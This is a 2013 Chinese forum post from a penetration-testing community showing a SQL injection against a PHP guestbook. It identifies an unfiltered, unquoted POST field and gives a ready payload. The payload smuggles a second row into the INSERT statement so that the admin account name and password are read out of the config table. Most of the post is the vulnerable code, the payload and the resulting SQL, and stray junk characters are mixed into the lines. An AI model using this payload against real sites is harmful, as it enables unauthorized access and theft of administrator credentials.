中国网络渗透测试联盟

标题: php留言本注入得帐号密码 [打印本页]
作者: admin    时间: 2013-2-19 08:10
标题: php留言本注入得帐号密码
留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
% b% p$ Z; \3 u# a9 q3 m
, d; b: R& X% L4 u$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
6 E0 ^4 o: [4 }5 v# @: G/ v7 T$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
  a0 I. t& z; @; u1 {% X, p0 }$ D  Y' n' ?  o
提交的时候把ifqqh的值改一下。变成* E/ D8 l" p; n. Q$ Y! _6 ^$ p( ?
) X% H9 W) n6 }7 B9 _$ F
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />6 a. J0 |3 u. c% j

4 K2 e9 G  j  R4 m  S这样SQL插入语句就变了.5 ]% w( k4 N$ k/ ^7 E/ l. u
  u+ U" ~2 O( I9 F+ Z8 S+ d
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
$ |8 i5 e; b# e) ~) d% w
: W& V" ?2 a4 D% t: P& X5 p构造了另外一句SQL。并且把帐号密码读出来。4 A0 p" Q& Z! [9 }# r
  }. q. K$ R# x# w0 Y5 _* E3 B3 v




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2